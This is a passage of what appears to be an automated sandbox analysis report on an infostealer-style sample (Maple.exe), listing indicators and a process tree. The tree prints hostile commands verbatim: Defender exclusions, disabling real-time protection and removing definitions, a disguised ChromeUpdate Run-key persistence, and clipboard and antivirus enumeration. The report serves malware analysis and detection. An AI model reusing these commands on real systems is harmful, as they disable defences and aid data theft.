chrome.exemsedge.exemsedge.exepid process 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 8652 msedge.exe 8652 msedge.exe 8652 msedge.exe 8652 msedge.exe 8652 msedge.exe 8652 msedge.exe 8652 msedge.exe 8652 msedge.exe 8652 msedge.exe 8652 msedge.exe 8652 msedge.exe 8652 msedge.exe 8652 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exetasklist.exemain.exetasklist.exepowershell.exetasklist.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exepowershell.exeUpdate.exeWMIC.exedescription pid process Token: SeDebugPrivilege 3252 powershell.exe Token: SeDebugPrivilege 2672 powershell.exe Token: SeDebugPrivilege 1540 tasklist.exe Token: SeDebugPrivilege 2500 main.exe Token: SeDebugPrivilege 4864 tasklist.exe Token: SeDebugPrivilege 4396 powershell.exe Token: SeDebugPrivilege 1376 tasklist.exe Token: SeIncreaseQuotaPrivilege 5208 WMIC.exe Token: SeSecurityPrivilege 5208 WMIC.exe Token: SeTakeOwnershipPrivilege 5208 WMIC.exe Token: SeLoadDriverPrivilege 5208 WMIC.exe Token: SeSystemProfilePrivilege 5208 WMIC.exe Token: SeSystemtimePrivilege 5208 WMIC.exe Token: SeProfSingleProcessPrivilege 5208 WMIC.exe Token: SeIncBasePriorityPrivilege 5208 WMIC.exe Token: SeCreatePagefilePrivilege 5208 WMIC.exe Token: SeBackupPrivilege 5208 WMIC.exe Token: SeRestorePrivilege 5208 WMIC.exe Token: SeShutdownPrivilege 5208 WMIC.exe Token: SeDebugPrivilege 5208 WMIC.exe Token: SeSystemEnvironmentPrivilege 5208 WMIC.exe Token: SeRemoteShutdownPrivilege 5208 WMIC.exe Token: SeUndockPrivilege 5208 WMIC.exe Token: SeManageVolumePrivilege 5208 WMIC.exe Token: 33 5208 WMIC.exe Token: 34 5208 WMIC.exe Token: 35 5208 WMIC.exe Token: 36 5208 WMIC.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeDebugPrivilege 1828 powershell.exe Token: SeDebugPrivilege 2224 powershell.exe Token: SeIncreaseQuotaPrivilege 5208 WMIC.exe Token: SeSecurityPrivilege 5208 WMIC.exe Token: SeTakeOwnershipPrivilege 5208 WMIC.exe Token: SeLoadDriverPrivilege 5208 WMIC.exe Token: SeSystemProfilePrivilege 5208 WMIC.exe Token: SeSystemtimePrivilege 5208 WMIC.exe Token: SeProfSingleProcessPrivilege 5208 WMIC.exe Token: SeIncBasePriorityPrivilege 5208 WMIC.exe Token: SeCreatePagefilePrivilege 5208 WMIC.exe Token: SeBackupPrivilege 5208 WMIC.exe Token: SeRestorePrivilege 5208 WMIC.exe Token: SeShutdownPrivilege 5208 WMIC.exe Token: SeDebugPrivilege 5208 WMIC.exe Token: SeSystemEnvironmentPrivilege 5208 WMIC.exe Token: SeRemoteShutdownPrivilege 5208 WMIC.exe Token: SeUndockPrivilege 5208 WMIC.exe Token: SeManageVolumePrivilege 5208 WMIC.exe Token: 33 5208 WMIC.exe Token: 34 5208 WMIC.exe Token: 35 5208 WMIC.exe Token: 36 5208 WMIC.exe Token: SeDebugPrivilege 9468 powershell.exe Token: SeDebugPrivilege 9912 tasklist.exe Token: SeDebugPrivilege 9936 powershell.exe Token: SeDebugPrivilege 8444 Update.exe Token: SeIncreaseQuotaPrivilege 4348 WMIC.exe Token: SeSecurityPrivilege 4348 WMIC.exe Token: SeTakeOwnershipPrivilege 4348 WMIC.exe Token: SeLoadDriverPrivilege 4348 WMIC.exe Token: SeSystemProfilePrivilege 4348 WMIC.exe Token: SeSystemtimePrivilege 4348 WMIC.exe Token: SeProfSingleProcessPrivilege 4348 WMIC.exe Token: SeIncBasePriorityPrivilege 4348 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
7zG.exe7zG.exeExplorer.EXEchrome.exemsedge.exepid process 7792 7zG.exe 10012 7zG.exe 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe 5568 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Explorer.EXEchrome.exepid process 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 3448 Explorer.EXE 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 6504 chrome.exe 3448 Explorer.EXE -
Suspicious use of SetWindowsHookEx 45 IoCs
Processes:
Update.exeExplorer.EXEmsedge.exefirefox.exepid process 8444 Update.exe 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 8688 msedge.exe 6776 firefox.exe 6776 firefox.exe 6776 firefox.exe 6776 firefox.exe 6776 firefox.exe 6776 firefox.exe 6776 firefox.exe 6776 firefox.exe -
Suspicious use of UnmapMainImage 3 IoCs
Processes:
RuntimeBroker.exeExplorer.EXERuntimeBroker.exepid process 4112 RuntimeBroker.exe 3448 Explorer.EXE 3052 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Maple.exeMaple.execmd.exeBuild.exehacn.exehacn.execmd.exebased.exebased.execmd.execmd.exes.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 808 wrote to memory of 1768 808 Maple.exe Maple.exe PID 808 wrote to memory of 1768 808 Maple.exe Maple.exe PID 1768 wrote to memory of 4160 1768 Maple.exe cmd.exe PID 1768 wrote to memory of 4160 1768 Maple.exe cmd.exe PID 4160 wrote to memory of 4304 4160 cmd.exe Build.exe PID 4160 wrote to memory of 4304 4160 cmd.exe Build.exe PID 4160 wrote to memory of 4304 4160 cmd.exe Build.exe PID 4304 wrote to memory of 4532 4304 Build.exe hacn.exe PID 4304 wrote to memory of 4532 4304 Build.exe hacn.exe PID 4532 wrote to memory of 4300 4532 hacn.exe hacn.exe PID 4532 wrote to memory of 4300 4532 hacn.exe hacn.exe PID 4300 wrote to memory of 4644 4300 hacn.exe cmd.exe PID 4300 wrote to memory of 4644 4300 hacn.exe cmd.exe PID 4304 wrote to memory of 2448 4304 Build.exe based.exe PID 4304 wrote to memory of 2448 4304 Build.exe based.exe PID 4644 wrote to memory of 4816 4644 cmd.exe s.exe PID 4644 wrote to memory of 4816 4644 cmd.exe s.exe PID 4644 wrote to memory of 4816 4644 cmd.exe s.exe PID 2448 wrote to memory of 1424 2448 based.exe based.exe PID 2448 wrote to memory of 1424 2448 based.exe based.exe PID 1424 wrote to memory of 4916 1424 based.exe cmd.exe PID 1424 wrote to memory of 4916 1424 based.exe cmd.exe PID 1424 wrote to memory of 4368 1424 based.exe cmd.exe PID 1424 wrote to memory of 4368 1424 based.exe cmd.exe PID 1424 wrote to memory of 4228 1424 based.exe cmd.exe PID 1424 wrote to memory of 4228 1424 based.exe cmd.exe PID 1424 wrote to memory of 2748 1424 based.exe cmd.exe PID 1424 wrote to memory of 2748 1424 based.exe cmd.exe PID 1424 wrote to memory of 4716 1424 based.exe cmd.exe PID 1424 wrote to memory of 4716 1424 based.exe cmd.exe PID 1424 wrote to memory of 632 1424 based.exe cmd.exe PID 1424 wrote to memory of 632 1424 based.exe cmd.exe PID 1424 wrote to memory of 956 1424 based.exe cmd.exe PID 1424 wrote to memory of 956 1424 based.exe cmd.exe PID 1424 wrote to memory of 1064 1424 based.exe cmd.exe PID 1424 wrote to memory of 1064 1424 based.exe cmd.exe PID 4916 wrote to memory of 3252 4916 cmd.exe powershell.exe PID 4916 wrote to memory of 3252 4916 cmd.exe powershell.exe PID 4368 wrote to memory of 2672 4368 cmd.exe powershell.exe PID 4368 wrote to memory of 2672 4368 cmd.exe powershell.exe PID 1424 wrote to memory of 4768 1424 based.exe cmd.exe PID 1424 wrote to memory of 4768 1424 based.exe cmd.exe PID 1424 wrote to memory of 3124 1424 based.exe cmd.exe PID 1424 wrote to memory of 3124 1424 based.exe cmd.exe PID 1424 wrote to memory of 1596 1424 based.exe cmd.exe PID 1424 wrote to memory of 1596 1424 based.exe cmd.exe PID 1424 wrote to memory of 2876 1424 based.exe cmd.exe PID 1424 wrote to memory of 2876 1424 based.exe cmd.exe PID 1424 wrote to memory of 1944 1424 based.exe cmd.exe PID 1424 wrote to memory of 1944 1424 based.exe cmd.exe PID 1424 wrote to memory of 3200 1424 based.exe cmd.exe PID 1424 wrote to memory of 3200 1424 based.exe cmd.exe PID 4816 wrote to memory of 2500 4816 s.exe main.exe PID 4816 wrote to memory of 2500 4816 s.exe main.exe PID 956 wrote to memory of 1540 956 cmd.exe tasklist.exe PID 956 wrote to memory of 1540 956 cmd.exe tasklist.exe PID 1064 wrote to memory of 4864 1064 cmd.exe tasklist.exe PID 1064 wrote to memory of 4864 1064 cmd.exe tasklist.exe PID 4228 wrote to memory of 4396 4228 cmd.exe powershell.exe PID 4228 wrote to memory of 4396 4228 cmd.exe powershell.exe PID 4716 wrote to memory of 3488 4716 cmd.exe mshta.exe PID 4716 wrote to memory of 3488 4716 cmd.exe mshta.exe PID 3124 wrote to memory of 1828 3124 cmd.exe powershell.exe PID 3124 wrote to memory of 1828 3124 cmd.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:60
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Modifies data under HKEY_USERS
PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:424
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1112
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1260
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2396
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4908
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1332
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1492
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2164
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1836
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x55c 0x5582⤵PID:4152
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1976
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2020
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2008
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2300
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2360
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2608
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3156
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3360
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3448 -
C:\Users\Admin\AppData\Local\Temp\maple\Maple.exe"C:\Users\Admin\AppData\Local\Temp\maple\Maple.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Users\Admin\AppData\Local\Temp\maple\Maple.exe"C:\Users\Admin\AppData\Local\Temp\maple\Maple.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI8082\Build.exe -pbeznogym4⤵
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Users\Admin\AppData\Local\Temp\_MEI8082\Build.exeC:\Users\Admin\AppData\Local\Temp\_MEI8082\Build.exe -pbeznogym5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI45322\s.exe -pbeznogym8⤵
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\_MEI45322\s.exeC:\Users\Admin\AppData\Local\Temp\_MEI45322\s.exe -pbeznogym9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\ProgramData\main.exe"C:\ProgramData\main.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpE8F8.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpE8F8.tmp.bat11⤵PID:9812
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2500"12⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:9912
-
-
C:\Windows\system32\find.exefind ":"12⤵PID:9920
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak12⤵
- Delays execution with timeout.exe
PID:7208
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:8444 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f13⤵PID:9336
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f14⤵
- Adds Run key to start application
- Modifies registry key
PID:10016
-
-
-
-
-
-
C:\ProgramData\svchost.exe"C:\ProgramData\svchost.exe"10⤵
- Executes dropped EXE
PID:2260 -
C:\ProgramData\svchost.exe"C:\ProgramData\svchost.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5724 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"12⤵PID:5892
-
-
-
-
C:\ProgramData\setup.exe"C:\ProgramData\setup.exe"10⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:5560
-
-
-
-
-
-
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"8⤵
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"8⤵
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"8⤵
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"8⤵PID:2748
-
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe9⤵
- Executes dropped EXE
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\onefile_1020_133660708718688291\main.exebound.exe10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5228 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c11⤵PID:5588
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"11⤵PID:8000
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Join discord.gg/input for more drops', 0, 'Done ', 48+16);close()""8⤵
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Join discord.gg/input for more drops', 0, 'Done ', 48+16);close()"9⤵PID:3488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"8⤵PID:632
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"8⤵PID:4768
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName9⤵
- Suspicious use of AdjustPrivilegeToken
PID:5208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"8⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵PID:1596
-
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:2876
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:1656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"8⤵PID:1944
-
C:\Windows\system32\systeminfo.exesysteminfo9⤵
- Gathers system information
PID:5188
-
-
-
